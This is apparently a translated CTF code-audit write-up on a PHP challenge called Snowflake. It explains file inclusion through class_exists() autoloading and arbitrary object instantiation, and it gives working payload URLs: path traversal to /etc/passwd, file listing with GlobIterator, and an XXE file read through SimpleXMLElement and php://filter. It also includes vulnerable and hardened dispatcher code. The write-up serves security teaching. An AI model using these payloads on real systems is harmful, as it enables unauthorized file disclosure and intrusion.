Red Sun code audit, day 3: arbitrary object instantiation vulnerability

Day 3 - Snow Flake

The challenge is called Snowflake; its code is shown below:
[image: challenge source code]

Vulnerability analysis:

There are two security holes in this code. The first is a file inclusion vulnerability. Line 8 of the code above uses class_exists() to check whether the controller name supplied by the user exists. By default class_exists() triggers autoloading, so when the program defines an __autoload function, that function is called automatically with the user-supplied class name, and that is where the file inclusion appears: the attacker can include arbitrary files through path traversal in the class name. According to the write-up, this traversal trick works on PHP 5 up to and including 5.3. For example, with the class name ../../../../etc/passwd the lookup includes /etc/passwd and its contents are displayed. The PHP manual defines class_exists() as follows:

class_exists (PHP 4, PHP 5, PHP 7)
Description: checks whether a class has been defined
Definition: bool class_exists ( string $class_name [, bool $autoload = true ] )
$class_name is the class name; matching is case-insensitive. $autoload defaults to true. When $autoload is true, the program's __autoload function is called for a class that is not yet defined; when it is false, __autoload is not called.


The incoming class name is not filtered at all, so besides traversal paths we can also pass the name of any of PHP's built-in classes; this is the second hole, arbitrary object instantiation, and it is the one used below.
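The following is an added example, not the challenge's own source (the write-up shows that only as an image). It reconstructs the pattern the analysis describes, a class name taken from the request, tested with class_exists() and then instantiated with two user-controlled constructor arguments, and puts a hardened dispatcher next to it. The controllers/ directory, the BaseController class and the request keys name, param and param2 are assumptions; the original used __autoload(), which PHP 8 removed, so spl_autoload_register() stands in for it here.

```php
<?php
// Added example modelling the write-up's pattern; not the challenge code.
// Assumed: controllers live in ./controllers/<ClassName>.php and the request
// carries name, param and param2 (as in the write-up's payload URLs).

// ---- Vulnerable pattern -----------------------------------------------------
// The autoloader builds an include path straight from the class name, so a
// request such as ?name=../../../../etc/passwd reaches include() through
// class_exists() before anything has checked that a class is even involved.
spl_autoload_register(function (string $class): void {
    include __DIR__ . '/controllers/' . $class . '.php';   // no path check
});

function vulnerableDispatch(array $req): ?object
{
    $name   = $req['name']   ?? 'Index';
    $param  = $req['param']  ?? '';
    $param2 = $req['param2'] ?? '';
    if (class_exists($name)) {                 // $autoload defaults to true
        // Every loaded class qualifies, built-ins included, so GlobIterator
        // or SimpleXMLElement can be instantiated with attacker arguments.
        return new $name($param, $param2);
    }
    return null;
}

// ---- Hardened version -------------------------------------------------------
// Map request names onto a fixed allow-list, load each class from a path the
// request cannot influence, and call class_exists() with $autoload = false so
// that no autoloader ever runs on request data. Constructor arguments remain
// user input, but they now reach only controllers written to accept them.
abstract class BaseController
{
    public function __construct(protected string $param, protected string $param2) {}
    abstract public function run(): string;
}

const CONTROLLERS = [
    'index' => 'IndexController',   // assumed controller names
    'snow'  => 'SnowController',
];

function safeDispatch(array $req): ?BaseController
{
    $key = strtolower((string) ($req['name'] ?? 'index'));
    if (!array_key_exists($key, CONTROLLERS)) {
        http_response_code(404);
        return null;                            // not on the allow-list
    }
    $class = CONTROLLERS[$key];                 // trusted name, never $req
    require_once __DIR__ . '/controllers/' . $class . '.php';
    if (!class_exists($class, false) || !is_subclass_of($class, BaseController::class)) {
        return null;                            // file did not define a controller
    }
    return new $class((string) ($req['param'] ?? ''), (string) ($req['param2'] ?? ''));
}
```

The allow-list is the point: once the class name comes from a server-side table rather than the request, neither the autoloader path nor the set of instantiable classes is attacker-controlled, and the two built-in gadgets used later in this write-up are out of reach.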

Here we use PHP's built-in classes directly. First the GlobIterator class is used to find the name of the flag file; the PHP manual defines its constructor as follows:

public GlobIterator::__construct ( string $pattern [, int $flags = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )

The first parameter is the glob pattern of the files to search for; the second selects what the iterator exposes as key and current value. Here FilesystemIterator::CURRENT_AS_FILEINFO is used, whose constant value is 0 (the constant values are listed in the manual), so the final payload for locating the file is:

http://localhost/CTF/index.php?name=GlobIterator&param=./*.php&param2=0

We find that the flag file is named f1agi3hEre.php. Next, the built-in SimpleXMLElement class is used to read it. This has to be combined with a PHP stream wrapper: if the file contains any of the five characters <, >, &, ' or ", the XML parser will fail, so php://filter is used to base64-encode the file contents before they are inserted into the document. The payload is:

http://localhost/CTF/index.php?name=SimpleXMLElement&param=<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=f1agi3hEre.php">]><x>%26xxe;</x>&param2=2

Here param2 is the $options argument of the SimpleXMLElement constructor: LIBXML_NOENT has the value 2 and tells libxml to substitute entities, which is what makes the external entity xxe expand to the base64-encoded file. The & of the entity reference is sent as %26 so it is not treated as a query-string separator.
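The two gadget chains above, as an added example that is not part of the write-up: it runs GlobIterator and the SimpleXMLElement XXE locally against a constructed temporary directory, so the meaning of param2=0 and param2=2 can be seen without a target. The flag file name comes from the write-up; its contents and the directory are made up here.

```php
<?php
// Added example reproducing the write-up's two gadgets locally; not its code.
// Constructed fixture: a temp directory with a stub index.php and a fake flag
// file whose source deliberately contains <, >, &, ' and ".
$dir = sys_get_temp_dir() . '/snowflake_' . getmypid();
mkdir($dir);
file_put_contents("$dir/index.php", "<?php /* dispatcher stub */\n");
file_put_contents("$dir/f1agi3hEre.php", "<?php \$flag = 'flag{constructed}'; // & <> ' \"\n");

// Step 1: GlobIterator as a directory lister. The flags value 0 is
// FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO
// (both constants are 0), i.e. exactly what param2=0 selected.
function listPhpFiles(string $dir): array
{
    $names = [];
    foreach (new GlobIterator("$dir/*.php", 0) as $path => $info) {
        $names[] = $info->getFilename();        // $info is an SplFileInfo
    }
    sort($names);
    return $names;
}

// Step 2: SimpleXMLElement as a file reader (XXE). The external entity points
// at php://filter so the target is base64-encoded before libxml sees it; the
// raw PHP source above would otherwise be a fatal XML parse error.
// The second constructor argument is $options; LIBXML_NOENT (value 2) makes
// libxml substitute the entity, which is why the write-up sends param2=2.
function readViaXxe(string $file): string
{
    $xml = '<?xml version="1.0"?>'
         . '<!DOCTYPE r [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource='
         . $file . '">]>'
         . '<r>&xxe;</r>';
    $el = new SimpleXMLElement($xml, LIBXML_NOENT);
    return base64_decode((string) $el);         // text of <r> is the encoded file
}

// Drive both steps the way the two payload URLs do: list first, then read
// the file that is not the dispatcher.
$files  = listPhpFiles($dir);
echo "php files: ", implode(', ', $files), "\n";
$target = array_values(array_filter($files, fn ($f) => $f !== 'index.php'))[0];
echo "contents of $target:\n", readViaXxe("$dir/$target");

// Remove the constructed fixture.
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

On PHP 8 the old libxml_disable_entity_loader() guard is gone and external entity loading is off by default, but passing LIBXML_NOENT switches entity substitution back on, so this chain still works wherever an application forwards an attacker-chosen options value into the SimpleXMLElement constructor.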

Summary

1. The user-supplied class name is not filtered, resulting in an arbitrary object instantiation vulnerability (and, through autoloading, a file inclusion).

2. Built-in class GlobIterator: enumerates the flag file.

3. Built-in class SimpleXMLElement: reads the flag file through XXE combined with php://filter.

Source: blog.csdn.net/qq_45951598/article/details/110825629